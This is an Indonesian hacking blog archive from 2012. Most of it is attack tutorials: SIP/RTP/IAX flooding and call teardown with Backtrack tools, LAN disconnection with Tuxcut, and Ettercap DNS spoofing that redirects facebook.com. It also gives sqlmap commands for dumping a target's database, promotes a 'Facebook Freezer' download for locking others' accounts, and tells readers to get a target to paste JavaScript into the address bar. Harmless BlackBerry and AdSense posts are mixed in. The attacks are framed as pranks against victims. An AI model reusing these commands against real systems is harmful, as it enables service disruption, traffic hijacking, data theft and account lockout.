Minggu, 25 November 2012

Denial of Service (DoS)

Denial Of Service

A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Let�s take a quick overview of the tools available in Backtrack 

Inviteflood

This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
interface (e.g. eth0)
target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
target domain (e.g. enterprise.com or an IPv4 address)
IPv4 addr of flood target (ddd.ddd.ddd.ddd)
flood stage (i.e. number of packets)
Optional -
-a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface]
-S srcPort (0 - 65535) [default is well-known discard port 9]
-D destPort (0 - 65535) [default is well-known SIP port 5060]
-l lineString line used by SNOM [default is blank]
-s sleep time btwn INVITE msgs (usec)
-h help - print this usage
-v verbose output mode

A basic usage syntax looks like this: 

./inviteflood eth0 target_extension target_domain target_ip number_of_packets


Sip 35.png


As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy. 

Rtpflood

Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID


Sip 36.png

Iaxflood

IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets


Sip 37.png

Teardown

Teardown is used to terminate a call by sending a bye request
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. 

SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0


Sip 38.png


If you specify the �-v� option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>


Video DNS Spoofing + Apache2 - Backtrack


Cara Memutus koneksi dengan Tuxcut - Backtrack



Tuxcut sama saja seperti netcut, yang digunakan untuk memotong/memutus koneksi client pada jaringan Wifi/wirelles dan LAN...

Tuxcut membutuhkan modul2 lain, seperti
-arp-scan
-dsniff
-arp-tables

jika belum mempunyai ketiga itu download dan instal saja ,,,

1. arp-scan ( buka terminal lalu ketik ) :

   apt-get install arp-scan

2. dsnif

    apt-get install dsniff

3. arp-tables

    apt-get install arptables

jika sudah Download Tuxcut disini https://bitbucket.org/a_atalla/tuxcut/downloads/
saat ini yang terbaru untuk backtrack/ubuntu yang " TuxCut-3.2_all.deb "

jika sudah d download instal dengan cara mengetikan perintah :

dpkg -i TuxCut-3.2_all.deb

di sesuaikan dengan direktorinya , jika filenya di simpan d dekstop jangan lp cd Desktop dl :D

Dan jika agan ingin menjalankannya cukup ketik perintah Tuxcut di terminal...


















- klik scan untuk scanning target...
- jika sudah muncul IP klik CUT untuk memutuskan koneksi korban
- Resume untuk menyambungkan lagi koneksi korban..
- Change MAC untuk menggantu MAC address kl tdk salah..
- Klik Protect Me untuk memproteksi koneksi anda...

* saya sudah mencoba pada jaringan Wireless ataupun LAN, dan Berhasil...

Selamat Mencoba....


DNS Spoofing With Ettercap - Backtrack




dulu saya pernah posting cara DNS spoofing di Windows menggunakan Cain and Abel...
sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap...
kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com ke www.statusbaru.com pada jaringan kabel ( LAN ) ataupun Wireles...
ok mulai...

- pertama buka etter.dns dengan perintah pada terminal :
gedit /usr/share/ettercap/etter.dns 
jika kosong cb disini gedit /usr/local/share/ettercap/etter.dns 
- Hapus semua tulisannya dan ganti dengan :
*.facebook.com A 63.141.225.196 ( 63.141.225.196 adalah ip statusbaru.com ) lalu save dan keluar
- jalankan dns_spoofing dgn perintah :
ettercap -Tqi eth0 anda -P dns_spoof -M arp // // lalu enter
ket :
eth0 adalah interface saya lihat sja dgn perintah ifconfig
dan pada // // bisa jg d isi dengan target pilihan anda..
contoh :
/target 1/ /target2/ 
dimana target 1 = default gateway dan target 2 = ip korban
ettercap -Tqi eth0 anda -P dns_spoof -M arp:remote /gateway/ /target/
tapi sy lebih senang dengan menggunakan " // // "saja :)
 - tunggu sampai target membuka www.facebook.com
jika berhasil maka di terminal akan ada jawaban : dns_spoof: [www.facebook.com] spoofed to [63.141.225.196] berarti kitasudah berhasil..

Selamat Mencoba... ^_^


Tutorial + Video Backtrack 5 Sql injection (sqlmap)

Kali ini saya akan share sql injection di Backtrack 5 dengan menggunakan sqlmap...
silahkan dilihat Videonya , untuk penjelasan baca di bawah..
maaf  jika kurang jelas ataupun ada yg salah...karena sayapun masih belajar...







- untuk membuka sqlmap buka terminal ( ctrl + t ) ketikan perintah cd /pentest/database/sqlmap
- untuk mencari nama database : ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 --dbs
-u = url , --dbs = mencari database
- untuk mencari nama tables :  ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase --tables
 - untuk mencari column ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase -T namatable --columns
- terakhir untuk melihat / mengambil isi dari table ./sqlmap.py -u http://www.targetanda.com/index.php?id=100 -D namadatabase -T namatable --dump


Semoga bermanfaat :)


Rabu, 21 November 2012

Israel akan serang DNS server indonesia?

hmmm ..
saya tau ini dari status teman saya ( bang depil )
yang status nya bertulis:

Kepada Yth. Bapak / Ibu
(Daftar Terlampir)
Di - Tempat

Dengan Hormat,

Berdasarkan informasi yang masuk melalui mailing list FIRST.ORG kepada id-SIRTII/CC pada tanggal 20 November 2012. Bahwa telah terjadi serangan yang cukup masiv kepada DNS Server milik Pemerintah Israel (147.237.71.1). Pemerintah Israel menyatakan akan melakukan serangan balasan kepada pihak-pihak yang dianggap terlibat dan bertanggungjawab.

Berkenan dengan hal tersebut diatas, id-SIRTII/CC memberikan peringatan dini:
Kemungkinan Akan Adanya Terjadinya Serangan Balasan terhadap DNS Server Indonesia.

Kami harapkan kepada semua pihak terkait untuk melakukan tindakan persiapan, pencegahan dan pengamanan terhadap kemungkinan serangan balik tersebut kepada DNS Server Indonesia dan IP yang berasal dari Indonesia.

Demikian peringatan dini ini kami sampaikan, atas perhatian dan kerjasamanya kami ucapkan terimakasih.

Hormat kami,

Mizamil
Wakil Ketua id-SIRTII/CC
(Bidang Sosialisasi dan Pelayanan Masyarakat)
 
dan fotonya:
 
 
 
wahhh kalo bener gimana ya?
pasti akan terjadi cyber war lagi nihh
pasti seruu , hahahaha
kalo kata bang depil , lo jual w beli =))


Clue Dupe Seal bulan november

buka 2 char seal online

yang bisa dupe hanya job clown

pake skill level 100an ke atas

lalu cell

lakukan berkali2

sampai ada koneksi server terputus

dan miss cell nya harus menggunakan scrool

dan lo harus party sama char yang mau lo dupe barangnya

maka pass lo dc otomatis barang yang lo trans itu akan ke dupe dengan sendiri nya

Creadit
Cheater Iseng

NB: kalo saya si belum di coba , tapi kayanya si bisa
silakan di coba dengan barang sampah dulu ^^
Thanks


Minggu, 11 November 2012

Cara Restart SmartPhone BlackBerry

BlackBerry adalah perangkat selular smartphone yang memiliki layanan untuk email, sms, telepon, internet dan juga BlackBerry Messenger (BBM). Dengan BlackBerry kita bisa menerima email dari mana saja, bisa berkomunikasi dengan cepat menggunakan layanan BBM.

Aplikasi-aplikasi blackberry lainnya juga dapat didownload melalui AppWorld yang ada di BlackBerry, baik yang gratis maupun berbayar. Biasanya setelah menginstall aplikasi BlackBerry kadang perangkat BlackBerry tersebut minta restart untuk bisa menjalankan aplikasi tersebut dengan normal.


Cara untuk restart BlackBerry biasanya dengan mencabut bateray BlackBerry dan memasukkan lagi bateray tersebut ke perangkat blackberry. Tapi karena kadang-kadang ada yang menggunakan lapis kasing BlackBerry, jadi kalau harus membuka bateray untuk restart sepertinya ribet sekali.

Tapi dengan cara ini lebih simple, cukup hanya dengan menekan beberapa tombol pada keyboard BlackBerry, sama halnya dengan komputer.

alt + shift (kanan) + del














Untuk restart BlackBerry dengan cara yang simple cukup hanya dengan menekan tombol Alt + Shift (sebelah kanan) + Del secara bersamaan pada keyboard / keypad BlackBerry, maka BlackBerry akan melakukan restart. Contohnya lihat gambar di atas.


Sabtu, 10 November 2012

[Update] Kumpulan JavaScript yg Lucu, Unik dan Keren


Dear All

nah sekarang gw mau bagi2 script yg udh lama banget gw simpan di folder2 gw
hmm.. ga semuanya lama sih, ada yg barunya juga kok hehe
yuk kita simak bareng2 :D

1. Love Tester

nih script digunakan untuk bermain seberapa persen kah kecocokan kita ma pasangan kita
kalo persentase nya kecil jangan nangis yah xD wkwkwkw
ini kan cuma permainan jadi, jangan dipercaya !
lihat contohnya dibawah ini :

Example

Code


2. Background Cange Color

Mengganti warna Background blog ( Sentuhan Ajaib Blog )

Example

Code


3. Neon Lights on Text

Bikin tulisan/kalimat kamu dengan script ini agar lebih keren
ato kamu bisa bikin nama seperti :

Example


Code


4. Say Love with JS

bilang cinta ma cewe pake JavaScript adalah hal teraneh :D
tapi, menurut gw gapapa 
itu adalah hal yg kreatif lhoo, nih kalo kamu ingin mencoba kodenya :


Code

Copy seluruh kode yg ada di link diatas, trus tempatkan di addres bar dan tekan ENTER 
lihat apa yg terjadi ^^ 

Cara nembak cewe pake script diatas :
- buka codenya
- COPAS cedenya ( suruh target yg kopas )
- taruh di addres bar dan tekan Enter
- Lihat respondbya ^^


5. Say Love with JS [ Part II ] 
 


Nih sama kayak yg diatas tetapi yg membedakannya adalah script ini akan bertanya dahulu apakah IYA ata TIDAK engkau menyukaiku xixixi
lihat dibawah ini :

Example

Code


6. FLIP Text Generator

Generator pembuat text terbalik
text terbalik ini juga dapat dibuat untuk update status di facebook lho ^^ 
nih contohnya :

Example

Code


7. Whos.Amung.us Hack

Example

Code


8. Change Background [MANUAL]

pilih salah satu Background yg mana menurut kamu bagus ^^
lihat contohnya dibawah ini :

Example

Code

____________________________________
Sekian dulu yah sobat
masih banyak lagi script yg harus gw share 
tapi untuk sementara segini dulu yah 
cz, hari ini gw mau jalan2 dulu hahaha
nanti kalo ga sibuk lagi 
pasti bakalan gw update yg baru hehe
mohon maaf kalo ada kata yg gabisa dimengerti 

makasih untuk kalian semua ^^

yg mau "Copas" jangan lupa beri sumber yah TQ


______________________________
UPDATE 7 Juni 2013

Mungkin host saya sedang dalam masalah, jadinya yg bekerja script nya cuma dikit :D



Untuk script yg lain, anda bisa cari disini

______________________________



Regards,
RazerSinx000


[Software] Facebook Freeze

Dear All 

senang bisa ngepost lagi :D
udah lama nih blog gw MT in mulu, wkwkwkwk 
soalnya gw ada urusan ma cewe hehe 
ya udah langsung ke inti nya aja yuk 

Nah sekarang kita mo ngebahas cara nge Freeze akun FB orang laen 
sebenernya trick ini udah jadul tapi berhubungan blog gw belom ada artikel ini 
yah gw masukin aja lah hahahaha :D
yg mau ngejahilin temennya ato siapa aja boleh kalo mau iseng xD

Liad SS :


Facebook Freezer v1.0 by GroundZero






















Tutorial :

















Ato baca aja ini :
1. ketikan EMAIL target pada Form eMail
2. Klik Frezee
3. Tunggu samapi proses selesai dan 
4. 100% akan berhasil

Effectnya :

- Akun yg di Freeze tidak akan bisa login
- Jika kamu udah merasa puas dan ingin membebaskan target silahkan klik Stop Freezing

Notes :
- Resiko tanggung sendiri yah :D

Untuk download klik link dibawah ini
>>>DOWNLOAD<<<

Regards,
MA-Licious


Senin, 05 November 2012

Melacak BlackBerry Yang Hilang

Selamat pagi kawan-kawanku semuanya, apa kabar...? Ya mudah-mudahan tetap dalam keadaan sehat.
Kali ini saya ingin berbagi tips bagaimana menemukan HP BlackBerry yang hilang. Setiap orang mungkin tidak ingin kehilangan, apalagi BlackBerry kesayangannya yang didalamnya terdapat banyak data-data penting dan juga contact-contact yang sangat penting. Apalagi BlackBerry nya dibeli dengan harga yang cukup mahal, sayang sekali kalau hilang.


Aplikasi BlackBerry Protect















Sedia payung sebelum hujan (kata pepatah). Sebelum kehilangan BlackBerry kesayangan anda, maka untuk mengantisipasi BlackBerry anda, anda protect lah BlackBerry kesayangan anda dengan applikasi BlackBerry Protect. Aplikasi ini gratis untuk di download dari App World BlackBerry. Ketik saja kata kunci "Blackberry Protect" setelah ketemu langsung saja install dulu di BlackBerry anda. Aplikasi ini akan terkoneksi secara otomatis ke ID BlackBerry anda, apabila ID BlackBerry anda sudah ada.

Setelah terinstall anda bisa kunjungi https://protect.blackberry.com lewat web browser dan silahkan login untuk memonitor BlackBerry anda lewat web browser.

Setelah anda login ke protect blackberry tersebut anda juga bisa memanage data-data yang sudah di backup lewat BlackBerry dan menghapus data-data di BlackBerry lewat internet. Selain itu juga bisa mengganti passwordnya.

Untuk lebih jelas apa yang ada di dalam web BlackBerry Protect lihat / klik gambar di bawah ini :

Web BlackBerry Protect


Jumat, 02 November 2012

Daftar Google Adsense Ga Pernah Lulus

Ternyata daftar program Google Adsense (GA) sulit sekali, udah beberapa kali mencoba mendaftar tapi akhirnya tetap ditolak terus, kemarin saya mencoba untuk daftar Google Adsense dan tadi pagi saya coba cek email dari google adsense, hasilnya di tolak karena kontent website tidak cukup untuk mengikuti program Google Adsense.


Pertama daftar dan direview oleh google adsense, saya mendapat email yang isinya google adsense sudah memeriksa sebagian dari website yang di daftarin, untuk melanjutkan review kedua dari google adsense kita harus menempatkan kode adsense google pada website yang didaftarin tersebut.

Akhirnya saya coba masuk ke http://www.google.com/adsense dan langsung mengcopy code adsense yang sudah tersedia ke website yang didaftarin ke google. Setelah memasang kode tersebut, saya menunggu jawaban dari google adsense selama dua hari ga kunjung datang jawabanya.

Tadi pagi saya coba buka email, eh ada email masuk dari google adsense yang isinya penolakan (kasian amat lu...). HAH.... NASIB..NASIB....

Isi dari email tersebut lihat / klik gambar di bawah ini :

email dari google adsense

















Yah,, mungkin memang belum ditakdirkan untuk memiliki account google adsense. Mungkin ini pertanda bahwa sebelum mendaftar google adsense kita harus memperhatikan syarat-syarat yang sudah ditentukan oleh google, jangan asal bikin blog / web kalau belum memenuhi syarat dari google adsense.

Harus berjuang dan bekerja lebih keras untuk meraih semua itu....!!! SEMANGAT....!!!